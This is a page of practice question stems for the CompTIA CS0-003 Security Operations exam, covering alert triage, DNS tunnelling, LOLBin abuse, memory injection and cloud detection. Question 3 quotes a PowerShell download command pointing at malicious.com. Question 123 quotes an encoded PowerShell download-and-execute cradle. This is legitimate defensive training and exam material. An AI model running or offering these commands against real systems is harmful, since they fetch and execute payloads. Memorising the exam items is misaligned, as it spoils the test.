Practice CS0-003 Security Operations questions with full explanations on every answer.
Start practicing
Security Operations — choose a session length
Free · No account required
Click any question to see the full explanation and answer options, or start a focused practice session above.
A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?
2During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?
3An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
4A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?
5A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?
6An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?
7During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?
8A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?
9An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?
10A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?
11An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?
12A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?
13A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)
14A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)
15A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)
16A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?
17During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?
18A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?
19A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?
20A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?
21An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?
22A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?
23Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?
24A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?
25During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?
26A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?
27An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?
28A security analyst is tuning a SIEM rule that generates alerts for any failed login attempt. The rule produces too many alerts, overwhelming the team. Which TWO actions would most effectively reduce false positives while maintaining detection of actual brute-force attacks?
29A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?
30An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?
31A security analyst is reviewing a SIEM alert for a single failed login attempt from an internal IP address to a file server. The analyst determines this is a false positive. Which step should the analyst take next?
32During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?
33A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?
34A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?
35An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?
36A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?
37During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?
38An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?
39An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?
40A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?
41An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?
42An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?
43A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)
44During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)
45An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)
46A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?
47During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?
48A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?
49A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?
50Which of the following log sources would be most useful for detecting DNS tunneling?
51A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?
52A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?
53An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?
54A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?
55During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?
56An analyst is reviewing a memory dump from a compromised workstation and finds a process that appears to be a legitimate system process but has a different parent process and is running from a non-standard location. Which analysis technique is most appropriate?
57A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?
58A security analyst is investigating a potential data exfiltration using DNS. Which TWO indicators are most consistent with DNS tunneling?
59A threat hunter is using osquery to look for persistence mechanisms on a set of Windows endpoints. Which THREE registry keys or scheduled tasks should the hunter check for common persistence?
60An analyst is configuring correlation rules in a SIEM. Which TWO data sources are essential for detecting lateral movement using pass-the-hash attacks?
61A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?
62During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?
63A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?
64An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?
65A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?
66Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?
67A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?
68An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?
69During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?
70An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?
71Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?
72An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?
73A security analyst is reviewing network traffic and suspects a host is infected with malware that uses a domain generation algorithm (DGA) for C2 communication. Which two of the following indicators are most consistent with DGA activity?
74During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?
75An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?
76A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?
77A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?
78During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?
79A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?
80A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?
81An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?
82A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?
83Which tool would best allow a security analyst to capture and analyze packets in real time to investigate a network anomaly?
84A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?
85During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?
86An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?
87A security analyst is configuring a vulnerability scanner for internal network scanning. The analyst wants to ensure the scanner can identify missing patches and software configurations that require administrative privileges to read. Which scan type should the analyst configure?
88A SOC analyst is investigating an alert from Azure Sentinel indicating a user account logged in from an unfamiliar location. The analyst wants to determine if this is a true positive. Which TWO additional log sources should the analyst correlate to make an informed decision?
89A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?
90An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?
91A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?
92During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?
93A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?
94A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?
95During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?
96A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?
97Which of the following is the best data source for detecting DNS tunneling activity?
98A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?
99An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?
100What is the primary purpose of performing credentialed vulnerability scans?
101A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?
102During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?
103A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?
104During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?
105A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?
106A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?
107During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?
108An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?
109A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?
110A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?
111Which of the following is the primary purpose of log normalisation in a SIEM?
112An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?
113During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?
114An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?
115A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?
116An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?
117Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?
118A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?
119During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?
120A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?
121A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?
122During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?
123An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?
124A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?
125During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?
126A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?
127A threat hunter is reviewing osquery data from endpoints and notices that the Windows Registry key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' contains an entry for 'C:\Users\Public\svchost.exe'. Which of the following best describes the significance of this finding?
128A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?
129An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?
130A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?
131During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?
132A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?
133A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)
134A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)
135A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)
136A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?
137During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?
138An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?
139An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?
140A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?
141An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?
142During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?
143A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?
144An analyst is reviewing a packet capture and notices a TCP connection with the following sequence: SYN, SYN-ACK, ACK, SYN, ACK. What does this pattern indicate?
145A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?
146An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?
147A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?
148An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)
149A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)
150An analyst is reviewing cloud audit logs from AWS CloudTrail and notices an API call to create an IAM user with administrative privileges from an IP address outside the corporate network. Which TWO actions should the analyst take first? (Select TWO.)
151A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?
152During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?
153A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?
154During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?
155A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?
156A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?
157During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?
158A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?
159A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?
160A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?
161A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?
162During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?
163A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?
164A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?
165A security analyst is analyzing a PCAP file from a network incident and notices a series of TCP connections with unusual flag combinations. Specifically, the SYN flag is set but the ACK flag is not set in the response, and the sequence numbers are not incrementing properly. The analyst suspects a TCP handshake manipulation. Which THREE TCP anomalies should the analyst document?
The Security Operations domain covers the key concepts tested in this area of the CS0-003 exam blueprint published by CompTIA. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CS0-003 domains — no account required.
The Courseiva CS0-003 question bank contains 165 questions in the Security Operations domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Security Operations domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
Save your results, see per-domain analytics, and get readiness scores — free, for every certification.
Sign Up FreeFree forever · Every certification included